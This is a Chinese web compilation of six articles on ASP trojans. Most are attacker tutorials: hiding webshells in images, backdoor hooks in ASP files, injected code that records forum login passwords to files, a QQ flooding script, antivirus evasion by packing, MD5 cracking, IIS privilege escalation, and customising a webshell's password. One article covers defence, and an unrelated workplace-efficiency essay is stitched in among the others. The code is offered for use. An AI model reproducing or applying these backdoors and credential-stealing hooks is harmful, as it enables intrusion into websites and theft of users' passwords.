教你成为ASP木马高手

以下是小编帮大家整理的教你成为ASP木马高手，本文共6篇，欢迎大家收藏分享。本文原稿由网友“xnl”提供。

篇1：教你成为ASP木马高手

1.名称：如何制作图片ASP木马 （可显示图片） 建一个asp文件，内容为 找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为 了运行成功，还要搜索<%和％>

建一个asp文件，内容为

找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为

了运行成功，还要搜索<%和％>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入

先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享， 复制一个木马过去运行即可， 3．名称：感受MD5暴力破解的魅力

rainbowcrack用法先用rtgen生成库 “rtgen md5 byte 1 7 5 2400 40000 all”

1和7代表密码最小和最大长度

阿汀我再加个方法：md5.rednoize.com/ 在线破解

或者到www.md5lookup.com/?category=01-3&;searck=on 4.很多时候我们做免杀木马，不用懂汇编，用北斗加壳程序就能逃杀，还有很多加壳软件，大家木马加壳 的时候最好多选择不知名的加壳软件 5．名称：隐蔽的插入型ASP木马

(1)在我们要做手脚的asp文件里加入如下内容

<%if request(“action”)=“ok” then%>

shell代码插在这里，最好是小马，还要加密一下

<%end if%>

访问的时候在你作手脚的asp文件后面加上?action=ok,即可

(2)另一种方法，在我们要做手脚的asp文件里加入如下内容

<%

on error resume next

strFileName = Request.QueryString(“filer”)

set bjStream = Server.createObject(“ABODB.Stream”)

objStream.Type = 1

objStream.Open

objStream.LoadFromFile strFileName

objStream.SaveToFile Server.mappath(“ating.asp”),2

%>

访问的时候在做手脚的asp文件后面加上?filer=XXX

XXX为你本地上传的一个路径如 c:ating123.asp

上传后在做手脚的asp的同文件夹中有ating,asp

（3）前提得到system权限，

进入网站目录下一层

mkdir s…

copy ating.asp s…/

这样杀毒软件找不到的

访问网站/s…/ating.asp即可 6. 工具hack520.tengyi.cn/chaojiyonghu.rar，此工具在该电脑生成一个超级用户 用户名为： hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的 7．名称：QQ群脚本攻击

打开qq对话诓，复制消息，然后

下面的内容保存为.vbs 文件，运行即可

Set WshShell= WScript.createobject(“WScript.Shell”)

WshShell.AppActivate “QQ信息攻击脚本”

for i=1 to 20

WScript.Sleep 1000

WshShell.SendKeys“^v”

WshShell.SendKeys i

WshShell.SendKeys “%s”

Next 8．搜索：程序制作：万鹏 有免费申请空间的，直接上传asp马即可 9. 名称：全面找出你站上的ASP木马

（1） 用杀毒软件

（2） 用FTP客户端软件，点“工具”->“比较文件夹”

（3） 用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马

（4） 用工具Beyond Compare 10名称：拓展思路拿DVBBS帐号 “一个人的圣经”的动画

（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样

老办法:

修改admin_login.asp得到明文DVBBS后台密码

在“username=trim(replace(request(”username“)这行后面

Dim fsoObject

Dim tsObject

Set fsoObject = Server.createObject(”Scripting.FileSystemObject“)

set tsObject = fsoObject.createTextFile(Server.MapPath(”laner.txt“))

tsObject.Write CStr(request(”password“))

Set fsoObject = Nothing

Set tsObject = Nothing

只要管理员登陆后台，在目录下就生成了laner.txt

（2）login.asp中Case ”login_chk“下:

on error resume next

Dim rain

set rain=server.createobject(”adodb.stream“)

rain.Type=2

rain.CharSet=”gb2312“

rain.Position=rain.Size

rain.Open

rain.LoadFromFile server.MapPath(”laner.asp“)

rain.writetext now&request(”username“)&”text:“&request(”password“)&chr(10)

rain.SaveToFile server.MapPath(”laner.asp“),2

rain.Close

set rain=nothing

这样laner.asp将获得全部登陆人的登陆时间，用户名和密码

（3）如果你有自己的网站或者另外的webshell(强烈建议使用):

可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:

<%if request(”n“)”“ and request(”p“)”“ then

on error resume next

Dim rain

set rain=server.createobject(”adodb.stream“)

rain.Type=2

rain.CharSet=”gb2312“

rain.Position=rain.Size

rain.Open

rain.LoadFromFile server.MapPath(”laner.asp“)

rain.writetext now&”Name:“&request(”n“)&”Password:“&request(”p“)&chr(10)

rain.SaveToFile server.MapPath(”laner.asp“),2

rain.Close

set rain=nothing

end if%>

篇2：教你打造ASP木马

这段时间一直在家养病，人快疯了！回黑基随便逛逛，

教你打造ASP木马

，

呵呵，发现一篇文章是ASP木马代码的。 看了看，突然想写点什么。也许是上面写的不完整吧。 第一步，修改密码：别人的马跟自己的区别第一个就是密码。 先把修改密码的地方找出来。代码如下： if Epass(trim(

篇3：教你提升asp木马权限

网络上传统的提升asp权限为系统的有两种:

1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system.

但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天

我要谈的关于adsutil.vbs提升权限.

2.用adsutil.vbs搞定.

在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法:

先举个例子:

有一群狗,这群狗里有几个长老级狗物,它们拥有着至高无上的权限,而其它的狗,他们的权限则少得可怜.

转到计算机上:

在IIS中,有几个Dll文件是拥有特权限的,我们可以理解为系统权限,就像长老级的狗.而解析asp的asp.dll则就像一只

普通的狗,他的权限少得可怜.

那 么,如果asp.dll也成了长老级的狗的话,那么asp不也就有了系统权限了吗,这是可以成立的.所以我们的思路也就是

把asp.dll加入特权的dll一族之中.提升步骤为:

<1>先查看有特权一话有哪些.

<2>加asp.dll加入特权一族

好了,下面我们就来实践这个过程.

1 )查看有特权的dll文件:

命令为:cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps

得到显示为:

C:\\Inetpub\\AdminScripts>cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps

Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

版权所有(C) Microsoft Corporation -. All rights reserved.

InProcessIsapiApps : (LIST) (5 Items)

”C:\\WINNT\\system32\\idq.dll“

”C:\\WINNT\\system32\\inetsrv\\httpext.dll“

”C:\\WINNT\\system32\\inetsrv\\httpodbc.dll“

”C:\\WINNT\\system32\\inetsrv\\ssinc.dll“

”C:\\WINNT\\system32\\msw3prt.dll“

看到没有,他说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

这几个文件,不同的机子,可能会不同.

2)把asp.dll加入特权一族:

因为asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定相同)

我 们现在加进去cscript. adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:\\WINNT\\system32\\idq.dll“ ”C:\\WINNT\\system32\\inetsrv\\httpext.dll“ ”C:\\WINNT\\system32\\inetsrv\\httpodbc.dll“ ”C:\\WINNT\\system32\\inetsrv\\ssinc.dll“ ”C:\\WINNT\\system32\\msw3prt.dll“”c:\\winnt\\system32\\inetsrv\\asp.dll“

好了,现在你可以用cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进

了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\\Inetpub\\AdminScripts>这个目录下.

那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

例:cscript. adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:\\WINNT\\system32\\idq.dll“ ”C:\\WINNT\\system32\\inetsrv\\httpext.dll“ ”C:\\WINNT\\system32\\inetsrv\\httpodbc.dll“ ”C:\\WINNT\\system32\\inetsrv\\ssinc.dll“ ”C:\\WINNT\\system32\\msw3prt.dll“

这样就可以了,当你再用cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps 这个语句查之时,如果没有看见asp.dll,

说明,asp的权限又恢复到以前的权限.

待续.....先去上课.

篇4：如何防范ASP木马

由于ASP它本身是服务器提供的一项服务功能，特别是最近由dvbbs的upfile文件出现漏洞以来，其高度的隐蔽性和难查杀性，对网站的安全造成了严重的威胁，因此针对ASP木马的防范和清除，为网管人员提出了更高的技术要求.

几个大的程序全部被发现存在上传漏洞，小程序更是不计其数，让asp木马一下占据了主流，得到广泛的使用，想必如果你是做服务器的话，一定为此头疼不止吧，特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历，事后除了对这种行径深恶痛绝外，许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的，特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马!

我们首先来说一下怎么样防范好了，说到防范我们自然要对asp木马的原理了，大道理我也不讲了，网上的文章有的是，简单的说asp木马其实就是用asp编写的网站程序，甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手，等等

它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限，要想禁止asp木马运行就等于禁止asp的运行，显然这是行不通的，这也是为什么asp木马猖獗的原因!有人要问了，是不是就没有办法了呢，不，有办法的：

第一：从源头入手，入侵者是怎么样上传asp木马的呢？一般有几种方法，通过sql注射手段，获取管理员权限，通过备份数据库的功能将asp木马写入服务器，

或者进入后台通过asp程序的上传功能的漏洞，上传木马等等，当然正常情况下，这些可以上传文件的asp程序都是有权限限制的，大多也限制了asp文件的上传。(比如：可以上传图片的新闻发布、图片管理程序，及可以上传更多类型文件的论坛程序等)，如果我们直接上传asp木马的话，我们会发现，程序会有提示，是不能直接上传的，但由于存在人为的asp设置错误及asp程序本身的漏洞，给了入侵者可乘之机，实现上传asp木马。

因此，防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上，如果你是用别人的程序的话，尽量用出名一点的大型一点的程序，这样漏洞自然就少一些，而且尽量使用最新的版本，并且要经常去 查看新版本或者是最新补丁，还有就是那些数据库默认路径呀，管理员密码默认呀，一定要改，形成习惯保证程序的安全性。

那么如果你是程序员的话，我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端，尽量少的在ASP文件里出现，涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意

篇5：教你成为职场效率高手

想过得有条有理，关键之一就是要简化自己的生活，

教你成为职场效率高手

工作定时大扫除，效率随时亮晶晶！

把工作安排得更有条理，是大多数企业经理人能够完成更多工作的关键，但是要让工作更有条理，并不复杂或困难。其实，大多数经理人心理都很清楚，自己该怎么做才能完成更多工作，难就难在，怎么实行这些构想、策略与技巧，让工作有条有理。

效率好、生产力高的经理人，会不断找各种方法克服混乱、全心处理重要工作、精简文书作业、避免浪费时间，必且妥善管理各项项目。这些方法都是经理人的基本工具，能够让经理人灵活又有效率。

工作不复杂

想过得有条有理，关键之一就是要简化自己的生活。在找出对自己真正重要事情(目标)的同时，也就是在花心力简化自己的生活。确认目标之后，可以用下列方法简化自己的生活：

1、拒绝琐事，或者至少要跟琐事保持距离──大幅减少你亲自参与的活动，不必担心自己会不会删减过头。你永远可以回过头去参加一些活动，尤其当你发现，有些活动比自己想象得还要重要的时候。

2、一次做好一件事──有时候，“一次做好一件事”的意思是，要拒绝同事浪费你的时间，

如果你让同事觉得，你总是随传随到，一定会占你便宜的。不要老是让步，造成同事不懂得规划工作，当然，直属长官的要求除外。

3、集中心力──研究显示，卓越人士通常具备特殊的天分，能够清楚知道，自己每天能为公司做出什么贡献，然后会先完成这件有贡献的事。

时间日志

掌握生活的第一步，就是找出时间用在哪里。你可以试试下面这个有趣的小实验：现在就坐下开始回想，一小时、一小时地回想自己一整天的活动。你的大脑会十分敏捷地告诉你，你把绝大部分的时间花在寻找潜在顾客、训练新进员工、规划、联络重要顾客，或是任何其它重要的分内工作，但是时间日志会呈现出不同的结果。

开始进行这项程序的时候会很痛苦，但是一定要坚持下去，这很重要。你会发现，有多少事情干扰你、有多少事情是可以避免的，以及你花在重要事项上的时间，那时，你就会发现自己花在有成效活动上的时间竟然这么少。

记下一整天甚至一周的时间日志，只要你明白，要让生活变得更有条理、要让工作有实际成效，就必须掌握自己运用时间的状况。明白了这一点，你就可以不用再做记录了，因为这表示你已经可以心无旁骛地工作了。

大师名言

“成就与失败的风险必定是相对。走过放在平地上的绳索不叫成就，没有风险，成就自然不值得骄傲，也必然没有喜悦可言。”――麦当劳创办人 雷.克罗克

“成功的关键是，专注在自己拥有的事物，而不是在缺乏的事物上。”――沙漠风暴将领 费德瑞克.法兰克斯将军

篇6：教你轻轻松松打造属于自己的ASP木马

这段时间一直在家养病，人快疯了！回黑基随便逛逛，呵呵，发现一篇文章是ASP木马代码的。

看了看，突然想写点什么。也许是上面写的不完整吧。

第一步，修改密码：别人的马跟自己的区别第一个就是密码。

先把修改密码的地方找出来。代码如下：

if Epass(trim(request.form(”password“)))=”qtjckgas3i“ then

response.cookies(”password“)=”7758521“

response.redirect rseb & ”?q=list.asp“

else %＞

重点在(trim(request.form(”password“)))=”qtjckgas3i“有些人以为这就是前一个人的密码。

呵呵，生成一个ASP上传一试。怎样？不行吧。呵呵。密码是加密了的。

第二步，按自己的意愿美化网页。

有人喜欢白色，有人喜欢黑色。象我，我就喜欢网页里有音乐。所以把HTML代码嵌入ASP里。注意如果ASP学得不是很好的

建议最好放在最顶端这样对于整个程序的思路都很清晰，而且不会破坏ASP内部语法。代码可以为：

颜色的修改。

如：COLOR: #000000; Color后面的参数就是颜色对应的参数。如果对参数不是很了解的，可以采用英语：Color:black;前面不加

“#”

当然了，美化可以根据自己的习惯来加，也可以加些特效脚本，不过我一般都只加音乐，多了就太花翘了，呵呵。

第三步，如何将原代码密码修改。

这步应该算第一步的补充吧，之所以放在后面单独说，因为他这里牵涉到一定的技术，也是本篇的精髓。”qtjckgas3i“这是被

加密过了的。是利用一个工具直接生成密码的。什么呢？呵呵，是段ASP代码。这里我给出源码希望大家能够学习一下。

<%

pass=”yourpsw“

temppass=StrReverse(left(pass&”zxcvbnm,./“,10))

templen=len(pass)

mmpassword=”“

for j=1 to 10

mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))

next

Epass=replace(mmpassword,”'“,”B“)

%>

<%=Epass%>

将上面的ASP代码COPY到记事本里，然后另存为asp的，传到ASP空间上。打开，呵呵，看到了什么？乱码？没错。这是利用ASP代码

直接导成WIN碎片格式的，假定我们想设置的密码是”hacker“就把他跟pass=”yourpsw“里的”yourpsw“替换，然后生成ASP上传下到

空间，打开，这时候现实的就是我们加密后的密码：q_uxqeledm 这时候把原木马的PSW-”qtjckgas3i\"给替换成我们加密后的密码

这样一个个性的ASP木马就出来了。登陆ASP木马时使用没有加密的密码登陆！

大家可以看看这是我简单修改后的ASP木马.

十招成为营销高手

如何成为职场的EQ高手

如何成为销售中的谈判高手

销售高手教你如何说服客户

当代大学生的必修课,成为一个社交高手？

教你成为ASP木马高手.doc

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档